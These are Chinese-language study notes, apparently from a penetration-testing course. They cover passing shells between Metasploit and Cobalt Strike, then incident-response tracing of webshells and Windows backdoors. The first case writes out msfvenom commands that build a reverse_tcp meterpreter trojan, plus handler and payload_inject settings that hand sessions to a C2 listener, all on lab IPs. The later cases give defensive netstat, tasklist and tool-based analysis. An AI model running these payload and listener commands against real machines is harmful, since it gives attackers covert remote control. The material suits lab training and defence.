数据来源

演示案例

• MSF&CobaltStrike 联动 Shell
• WEB 攻击应急响应朔源-后门,日志
• WIN 系统攻击应急响应朔源-后门,日志,流量
• 临时给大家看看学的好的怎么干对应 CTF 比赛

案例1 - MSF&CobaltStrike联动Shell

CS下载与安装：cobaltstrike的安装与基础使用_cobalt strike windows运行_正经人_____的博客-CSDN博客

环境准备：一台kali，一台靶机（我这里为了简单一点，就用两台虚拟机，你可以在远程服务器部署CS，然后kali中运行MSF(kail自带)，最后在找一台靶机） 

CS->MSF

1）先配置cs

先使用CS创建一个监听器

随便使用个监听器生成木马并上线就好（使用那个监听器生成木马上线都行，只要能上线）

2）使用msf创建监听

我这里是在kali中重新打开一个终端（msf是kali自带的）

msfconsole                         # 启动 metasploita命令行
use exploit/multi/handler          # 使用模块
set payload windows/meterpreter/reverse_http      # 这里使用的攻击载荷要与CS监听器的相同（名字并不是完全相同，同样是windows的模块 然后最后的协议一样就好reverse_http）set lhost 192.168.22.145         # 设置监听的ip，要与cs的监听器相同set lport 6677                    # 端口也要与cs监听器端口保持一致
run                               # 启动模块

 

然后回到cs将后门的shell转发一个给msf 

 

大概等一分钟左右就上线了

MSF->CS

1）CS创建监听器 

 

2）使用msf拿到受害者的shell会话

要使用msf创建木马然后开启监听，再把木马复制到受害者主机中上线

生成木马

#                  攻击载荷                             监听ip       监听端口   demo999.exe（生成的文件名）         
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.3 lport=9988 -f exe -o demo999.exe

开启监听

msfconsole                                        # 启动 metasploita命令行
use exploit/multi/handler                         # 使用模块
set payload windows/x64/meterpreter/reverse_tcp   # 这个攻击载荷就是上面我们使用的攻击载荷
set LHOST 192.168.1.3                             # LHOSTS为 listen host （侦听主机）代表你是谁，既kali的IP地址
set lport 9988                                    # 就是要在kali上要开启的端口，注意这里的端口要和前面生成木马文件的端口一样
run                                               # 简单理解就是把鱼钩放到河里

到靶机中执行木马

监听msf的监听情况，成功拿到shell 

3）msf获取到shell会话后的操作

先background退出会话，查看当前的sessions会话

 进入模块exploit/windows/local/payload_inject，查看需要设置的参数

use exploit/windows/local/payload_inject        # 进入模块
show options                                    # 查看设置

 

设置payload，这里的payload需要与cs处监听器设置的协议保持一致

set payload windows/meterpreter/reverse_http

show options查看并设置参数，设置端口，与cs处保持一致，设置lhost为cs服务器的ip地址，载入对应的session会话

set lport 17822              # 端口需要与cs监听器端口保持一致``
set lhost 192.168.1.3       # IP设置为msf本地IP，与CS设置保持一致``
set session 1               # 最开启查看的session的id就是1

run     # 最后运行攻击模块

 

 

案例2 - WEB攻击应急响应溯源-后门，日志

故事回顾：某客户反应自己的网站首页出现被篡改，请求支援

分析：涉及的攻击面 涉及的操作权限 涉及的攻击意图 涉及的攻击方式

• 思路1：利用日志定位修改时间基数，将前时间进行攻击分析，后时间进行操作分析
• 思路2：利用后门WebShell查杀脚本或工具找到对应后门文件，定位第一次时间分析

netstat -ano

站在攻击者的角度，去分析。攻击者当前拿到哪些权限，网站还是系统权限。装没装杀软，用渗透者的思路去想问题。注重信息搜集，从攻击面入手查看应急响应。 

1）执行netstat -ano命令，通过开放的端口找到对应的PID。 

netstat -ano   # 查看本机开放的端口

2）执行tasklist -svc命令，通过PID找到对应的进程名称

tasklist /svc

 

3）在任务管理器，找到对应的进程

之后就可以停止服务并删除文件

4）也可以进行日志分析

p74 应急响应-win&linux 分析后门&勒索病毒&攻击_cs生成linux木马_正经人_____的博客-CSDN博客

p73 应急响应-WEB 分析 php&javaweb&自动化工具_正经人_____的博客-CSDN博客 

案例3 - Win系统攻击应急响应溯源-后门，日志，流量

分析：涉及的攻击面 涉及的操作权限 涉及的攻击意图 涉及的攻击方式

故事回顾：某客户反应服务器异常出现卡顿等情况

思路：利用监控工具分析可疑进程，利用杀毒软件分析可疑文件，利用接口工具抓流量

获取进程监控：PCHunter64

 一般的木马是没有产商信息 

但是有些伪装的很好所以这个不能作为我们判断的唯一标准，可以再借助一些其他信息辅助我们进行判断 

远程ip

可以在目标主机的命令行查看端口信息 

# 查看本机端口开放信息
netstat -an

计划任务

系统用户名

还可以借助一些杀毒软件：腾讯、360、火绒这些

获取执行列表：UserAssistView

我感觉这个软件没有 PCHunter64 好用

  

涉及资源

• https://www.onlinedown.net/soft/628964.htm
• https://www.cnblogs.com/xiaozi/p/12679777.html
• http://www.pc6.com/softview/SoftView_195167.html
• https://github.com/EricZimmerman/AppCompatCacheParser/releases/